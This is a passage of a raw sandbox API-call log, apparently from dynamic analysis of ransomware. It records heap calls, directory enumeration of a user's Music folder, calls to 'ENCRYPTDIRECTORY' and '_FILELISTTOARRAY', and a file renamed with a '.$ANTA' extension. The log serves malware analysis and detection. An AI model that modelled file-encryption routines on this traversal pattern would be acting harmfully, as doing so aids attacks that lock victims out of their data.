ftCreationTime.dwHighDateTime=0x1d5e41e, ftLastAccessTime.dwLowDateTime=0x7c77e8d0, ftLastAccessTime.dwHighDateTime=0x1d5e9a0, ftLastWriteTime.dwLowDateTime=0x7c77e8d0, ftLastWriteTime.dwHighDateTime=0x1d5e9a0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="evi6Nl1 g1KyY", cAlternateFileName="EVI6NL~1")) returned 1 [0114.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0114.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0114.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0114.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0114.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0114.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0114.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0114.862] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0114.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0114.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0114.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.862] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0114.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0114.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0114.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea6b8 [0114.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0114.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0114.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0114.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0114.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.863] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0114.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0114.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0114.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0114.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0114.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0114.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0114.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0114.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0114.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0114.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0114.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0114.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0114.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0114.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0114.863] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0114.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0114.863] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0114.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0114.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0114.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0114.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0114.864] FindNextFileW (in: hFindFile=0x41ac040, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x107e9e51, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x107e9e51, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x108c2667, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xbdb0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="mxXesXXst_.mp3.$ANTA", cAlternateFileName="MXXESX~1.$AN")) returned 1 [0114.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0114.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0114.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0114.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0114.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0114.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0114.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0114.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0114.864] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0114.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea268 [0114.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0114.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0114.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.864] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0114.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0114.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0114.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0114.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0114.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0114.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0114.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0114.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0114.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0114.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0114.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0114.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0114.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0114.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0114.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0114.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0114.998] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0114.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0114.998] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0114.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0114.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0114.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0114.998] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0114.998] FindNextFileW (in: hFindFile=0x41ac040, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e2640, ftCreationTime.dwHighDateTime=0x144ed98, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e2640, ftLastWriteTime.dwLowDateTime=0x43e97a0, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="", cAlternateFileName="ミмńဓ+\x10")) returned 0 [0114.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0114.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0114.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0114.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0114.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0114.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0114.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0114.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0114.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0114.999] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0114.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea6b8 [0114.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0114.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0114.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0114.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0114.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0114.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3b8 [0114.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2e0 [0114.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0114.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0114.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0114.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0114.999] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0115.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0115.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0115.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0115.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0115.000] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0115.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0115.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0115.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0115.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0115.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0115.000] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0115.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0115.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0115.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0115.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0115.001] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|evi6Nl1 g1KyY", cchCount1=14, lpString2="", cchCount2=0) returned 3 [0115.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0115.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0115.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0115.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0115.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0115.001] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0115.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0115.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0115.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0115.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0115.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0115.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0115.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0115.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0115.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0115.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0115.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0115.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0115.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0115.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0115.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0115.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0115.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0115.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0115.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0115.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0115.047] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0115.047] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0115.047] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy")) returned 0x10 [0115.048] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\*", lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9012730, ftCreationTime.dwHighDateTime=0x1d5e41e, ftLastAccessTime.dwLowDateTime=0x7c77e8d0, ftLastAccessTime.dwHighDateTime=0x1d5e9a0, ftLastWriteTime.dwLowDateTime=0x7c77e8d0, ftLastWriteTime.dwHighDateTime=0x1d5e9a0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca580, cFileName=".", cAlternateFileName="")) returned 0x41ac440 [0115.048] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9012730, ftCreationTime.dwHighDateTime=0x1d5e41e, ftLastAccessTime.dwLowDateTime=0x7c77e8d0, ftLastAccessTime.dwHighDateTime=0x1d5e9a0, ftLastWriteTime.dwLowDateTime=0x7c77e8d0, ftLastWriteTime.dwHighDateTime=0x1d5e9a0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca580, cFileName="..", cAlternateFileName="")) returned 1 [0115.048] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3e07b50, ftCreationTime.dwHighDateTime=0x1d5ef8e, ftLastAccessTime.dwLowDateTime=0x16f59510, ftLastAccessTime.dwHighDateTime=0x1d5ede3, ftLastWriteTime.dwLowDateTime=0x16f59510, ftLastWriteTime.dwHighDateTime=0x1d5ede3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca580, cFileName="-a1fx91SeT 48T", cAlternateFileName="-A1FX9~1")) returned 1 [0115.048] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f0f9c40, ftCreationTime.dwHighDateTime=0x1d5ed25, ftLastAccessTime.dwLowDateTime=0xd9ec78c0, ftLastAccessTime.dwHighDateTime=0x1d5e6b5, ftLastWriteTime.dwLowDateTime=0xd9ec78c0, ftLastWriteTime.dwHighDateTime=0x1d5e6b5, nFileSizeHigh=0x0, nFileSizeLow=0x6953, dwReserved0=0x144ecd8, dwReserved1=0x8, cFileName="0QhbS_hT9Zbd62A.m4a", cAlternateFileName="0QHBS_~1.M4A")) returned 1 [0115.048] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a4a8760, ftCreationTime.dwHighDateTime=0x1d5e604, ftLastAccessTime.dwLowDateTime=0x1d7d5360, ftLastAccessTime.dwHighDateTime=0x1d5ee73, ftLastWriteTime.dwLowDateTime=0x1d7d5360, ftLastWriteTime.dwHighDateTime=0x1d5ee73, nFileSizeHigh=0x0, nFileSizeLow=0xafc6, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="4YRCHooZsp.mp3", cAlternateFileName="4YRCHO~1.MP3")) returned 1 [0115.048] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd896870, ftCreationTime.dwHighDateTime=0x1d5e460, ftLastAccessTime.dwLowDateTime=0xcd2a4b80, ftLastAccessTime.dwHighDateTime=0x1d5eeda, ftLastWriteTime.dwLowDateTime=0xcd2a4b80, ftLastWriteTime.dwHighDateTime=0x1d5eeda, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="A-LWlY-3UKn4PQ_Otnq", cAlternateFileName="A-LWLY~1")) returned 1 [0115.048] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dee1750, ftCreationTime.dwHighDateTime=0x1d5e7db, ftLastAccessTime.dwLowDateTime=0x8f87cd00, ftLastAccessTime.dwHighDateTime=0x1d5ef0e, ftLastWriteTime.dwLowDateTime=0x8f87cd00, ftLastWriteTime.dwHighDateTime=0x1d5ef0e, nFileSizeHigh=0x0, nFileSizeLow=0x13ad5, dwReserved0=0x144ecd8, dwReserved1=0x8, cFileName="g4kPqWyZSQA5pz.wav", cAlternateFileName="G4KPQW~1.WAV")) returned 1 [0115.048] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x688891c0, ftCreationTime.dwHighDateTime=0x1d5ebe0, ftLastAccessTime.dwLowDateTime=0xc9dd75c0, ftLastAccessTime.dwHighDateTime=0x1d5ecfe, ftLastWriteTime.dwLowDateTime=0xc9dd75c0, ftLastWriteTime.dwHighDateTime=0x1d5ecfe, nFileSizeHigh=0x0, nFileSizeLow=0x132ef, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="zMKZMHlWmMpV7lZ.m4a", cAlternateFileName="ZMKZMH~1.M4A")) returned 1 [0115.048] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2700, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x10, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, 